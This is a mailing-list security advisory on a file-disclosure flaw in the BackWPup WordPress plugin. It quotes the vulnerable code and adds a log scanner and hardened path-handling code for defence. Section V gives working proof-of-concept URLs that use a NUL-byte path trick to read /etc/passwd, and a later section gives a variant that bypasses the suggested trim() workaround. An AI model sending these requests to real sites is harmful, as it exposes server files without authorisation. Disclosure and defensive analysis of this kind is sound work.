List: full-disclosure
Subject: [Full-disclosure] BackWPup Wordpress plugin <= 1.4.0 File content
From: Danilo Massa <danilo_m () yahoo ! com>
Date: 2011-02-28 15:41:19
Message-ID: 913509.37937.qm () web114218 ! mail ! gq1 ! yahoo ! com
=============================================
- Release date: Feb 28th, 2011
- Discovered by: Danilo Massa
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
BackWPup Wordpress plugin <= 1.4.0 File content disclosure
II. BACKGROUND
-------------------------
BackWPup 1.4.0 is a full-featured backup management solution for WordPress.
The plugin provides:
- Database Backup
- WordPress XML Export
- Optimize Database
- Check/Repair Database
- File Backup
- Backups in zip,tar,tar.gz,tar.bz2 format
- Store backup to Folder
- Store backup to FTP Server
- Store backup to Amazon S3
- Store backup to RackSpaceCloud
- Store backup to DropBox
- Send Log/Backup by eMail
III. INTRODUCTION
-------------------------
BackWPup version 1.4.0 (and possibly earlier releases) has an unfiltered
parameter in two PHP pages that lets a remote user read sensitive files such as
/etc/passwd.
No authentication required. No plugin activation required.
IV. DESCRIPTION
-------------------------
Input passed via the "wpabs" parameter to the PHP pages
- wp-content/plugins/backwpup/app/options-view_log-iframe.php
- wp-content/plugins/backwpup/app/options-runnow-iframe.php
is not sanitized before being used.
Both files begin by including wp-load.php through a path built from the wpabs
parameter, and that parameter can be supplied by anyone who requests the page
directly.
options-view_log-iframe.php:
<?PHP
if (file_exists($_GET['wpabs'].'wp-load.php') and file_exists($_GET['logfile']))
{
    require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
    ...

options-runnow-iframe.php:
if (file_exists($_GET['wpabs'].'wp-load.php') and is_numeric(trim($_GET['jobid']))) {
    require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
    ...
Inserting a string terminator (%00, a NUL byte) in the wpabs parameter makes it
possible to name a file instead of a directory: PHP releases before 5.3.4 passed
the path to the C library as a NUL-terminated string, so the 'wp-load.php' suffix
is silently dropped, file_exists() succeeds for the file named before the NUL, and
require_once() includes it. A file that contains no PHP code is simply echoed into
the page. (PHP 5.3.4 and later reject paths containing NUL bytes, so this
particular trick depends on the PHP version on the host.)
NOTE: also the
V. PROOF OF CONCEPT
-------------------------
Below is a harmless test that can be run against a Unix machine hosting WordPress
with the vulnerable plugin.
http://<wordpress_site>/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1
http://<wordpress_site>/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd
Both of them will display the /etc/passwd file.
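The requests above leave a distinctive trace in the web server's access log. What follows is an added example for this advisory, not code from the plugin or from its author: a small PHP scanner that flags requests to the two iframe scripts named in section IV whose wpabs value carries a NUL byte or a traversal sequence. It assumes PHP 7.1 or later and combined-format log lines; the three log lines at the bottom are constructed samples, and the function names are this example's own.

```php
<?php
// Added example, not part of the advisory: flag requests to the two BackWPup
// iframe scripts whose "wpabs" value carries a NUL byte or a traversal sequence.
// Assumes PHP 7.1+ and combined-format access logs; the log lines are constructed.

const BACKWPUP_IFRAME_SCRIPTS = array(
    '/backwpup/app/options-view_log-iframe.php',
    '/backwpup/app/options-runnow-iframe.php',
);

// Returns a reason string when the request line targets one of the scripts with a
// suspicious wpabs value, or null when it looks benign.
function classify_request(string $request_line): ?string
{
    // Request line shape: "GET /path?query HTTP/1.1"
    if (!preg_match('#^[A-Z]+ (\S+) HTTP/#', $request_line, $m)) {
        return null;
    }
    $path  = parse_url($m[1], PHP_URL_PATH);
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($path) || !is_string($query)) {
        return null;
    }
    $targeted = false;
    foreach (BACKWPUP_IFRAME_SCRIPTS as $script) {
        if (substr($path, -strlen($script)) === $script) {
            $targeted = true;
        }
    }
    if (!$targeted) {
        return null;
    }
    parse_str($query, $params);           // percent-decodes, so %00 becomes a real NUL byte
    if (!isset($params['wpabs']) || !is_string($params['wpabs'])) {
        return null;
    }
    $wpabs = $params['wpabs'];
    if (strpos($wpabs, "\0") !== false) {
        return 'NUL byte in wpabs';
    }
    if (strpos($wpabs, '..') !== false) {
        return 'directory traversal in wpabs';
    }
    return null;
}

// Scans whole log lines and returns one entry per flagged request.
function scan_access_log(array $lines): array
{
    $hits = array();
    foreach ($lines as $i => $line) {
        if (!preg_match('#"([A-Z]+ \S+ HTTP/[0-9.]+)"#', $line, $m)) {
            continue;
        }
        $reason = classify_request($m[1]);
        if ($reason !== null) {
            $hits[] = array('line' => $i + 1, 'client' => strtok($line, ' '), 'reason' => $reason);
        }
    }
    return $hits;
}

// Constructed sample: the advisory's PoC request, a legitimate call, and a traversal attempt.
$sample_log = array(
    '203.0.113.5 - - [28/Feb/2011:15:41:19 +0000] "GET /wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1 HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [28/Feb/2011:15:42:02 +0000] "GET /wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/var/www/html/&logfile=/var/www/html/wp-content/backwpup/log.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [28/Feb/2011:15:43:10 +0000] "GET /wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=../../../../../../etc/&logfile=x HTTP/1.1" 200 99 "-" "curl/7.21"',
);

foreach (scan_access_log($sample_log) as $hit) {
    printf("line %d  %-12s %s\n", $hit['line'], $hit['client'], $hit['reason']);
}
```

Lines 1 and 3 of the sample are reported; line 2 is an ordinary absolute ABSPATH and passes. The scanner decodes the query string once, exactly as PHP does for $_GET, so it sees the same wpabs value the vulnerable scripts saw; a legitimate wpabs is an absolute directory path, which is why only the NUL byte and ".." are treated as indicators rather than the leading slash.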
VI. BUSINESS IMPACT
-------------------------
An attacker could exploit the vulnerability to retrieve virtually any text file
readable by the web application server user.
VII. SYSTEMS AFFECTED
-------------------------
Version 1.4.0 is vulnerable.
Versions <1.4.0 could be vulnerable.
VIII. SOLUTION
-------------------------
Upgrade to a patched release (1.4.1 or later). As a quick workaround, wrap each
$_GET['wpabs'] in a trim() call, which strips a trailing NUL byte, like this:
if (file_exists(trim($_GET['wpabs']).'wp-load.php') and
    file_exists($_GET['logfile'])) {
Note that trim() removes NUL bytes only at the start and end of the value; a NUL
followed by any other character (wpabs=/etc/passwd%00x) passes through it, so
this is a stopgap rather than a fix. The proper fix is to stop taking the path
from the request at all and locate wp-load.php relative to the script's own
directory.
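To make the mechanism in section IV and the limits of the trim() workaround concrete, here is an added example that is not code from the plugin or from the advisory. It puts the vulnerable construction, the trim() stopgap and a hardened replacement side by side, and emulates the NUL truncation that PHP before 5.3.4 performed (modern PHP refuses such paths, so the emulation never touches the filesystem with a NUL in the path). It assumes PHP 7.1 or later and the plugin's directory layout wp-content/plugins/backwpup/app/, four levels below the WordPress root; the function names and the throwaway directory tree are this example's own.

```php
<?php
// Added example, not taken from the plugin: the three path constructions side by
// side, plus an emulation of how PHP before 5.3.4 handed a path with a NUL byte
// to the C library. Assumes PHP 7.1+ and the plugin layout
// wp-content/plugins/backwpup/app/ (four directories below the WordPress root).

// PHP < 5.3.4 passed the path straight to the C runtime, which stops at the
// first NUL byte. This reproduces that truncation without touching the
// filesystem (modern PHP refuses such paths outright).
function as_seen_by_libc(string $path): string
{
    $nul = strpos($path, "\0");
    return $nul === false ? $path : substr($path, 0, $nul);
}

// 1. The construction used by both iframe scripts.
function include_path_vulnerable(string $wpabs): string
{
    return $wpabs . 'wp-load.php';
}

// 2. The advisory's trim() stopgap. trim() drops "\0" only from the ends of the string.
function include_path_trimmed(string $wpabs): string
{
    return trim($wpabs) . 'wp-load.php';
}

// 3. Hardened: do not read the location from the request at all; derive it from
//    the script's own directory (in the real plugin, __DIR__) and make sure the
//    result is an existing regular file.
function include_path_hardened(string $plugin_app_dir): ?string
{
    $resolved = realpath($plugin_app_dir . '/../../../../wp-load.php');
    if ($resolved === false || !is_file($resolved)) {
        return null;
    }
    return $resolved;
}

// Constructed inputs: a legitimate ABSPATH, the advisory's PoC, and a variant that
// defeats trim() because the NUL byte is no longer at the end of the value.
$inputs = array(
    'legitimate ABSPATH'      => '/var/www/html/',
    'PoC: /etc/passwd%00'     => "/etc/passwd\0",
    'bypass: /etc/passwd%00x' => "/etc/passwd\0x",
);
foreach ($inputs as $label => $wpabs) {
    printf("%-26s vulnerable opens %-26s trimmed opens %s\n",
        $label,
        as_seen_by_libc(include_path_vulnerable($wpabs)),
        as_seen_by_libc(include_path_trimmed($wpabs)));
}

// The hardened version against a throwaway directory tree shaped like a WordPress install.
$root = sys_get_temp_dir() . '/wpdemo_' . getmypid();
$app  = $root . '/wp-content/plugins/backwpup/app';
mkdir($app, 0700, true);
file_put_contents($root . '/wp-load.php', "<?php // stand-in for the WordPress loader\n");
printf("hardened resolves to %s\n", include_path_hardened($app));
// Clean up the throwaway tree.
unlink($root . '/wp-load.php');
for ($dir = $app; $dir !== $root; $dir = dirname($dir)) {
    rmdir($dir);
}
rmdir($root);
```

For the PoC value the vulnerable construction opens /etc/passwd while the trimmed one opens the non-existent /etc/passwdwp-load.php, which is why the workaround stops the published test; for the variant with a byte after the NUL both constructions open /etc/passwd. The hardened function never looks at the request, so no wpabs value can influence which file is included, and realpath() plus is_file() also reject a missing or non-regular target.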
IX. REFERENCES
-------------------------
http://wordpress.org/extend/plugins/backwpup/
http://danielhuesken.de/portfolio/backwpup/
X. CREDITS
-------------------------
The vulnerability has been discovered by Danilo Massa
danilo(under_score)m(at)yahoo(dot)com
XI. VULNERABILITY HISTORY
-------------------------
January 28th, 2011: Vulnerability identification
January 30th, 2011: Vendor notification
January 30th, 2011: Vendor releases an updated version (1.4.1)
February 28th, 2011: Vulnerability disclosure
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/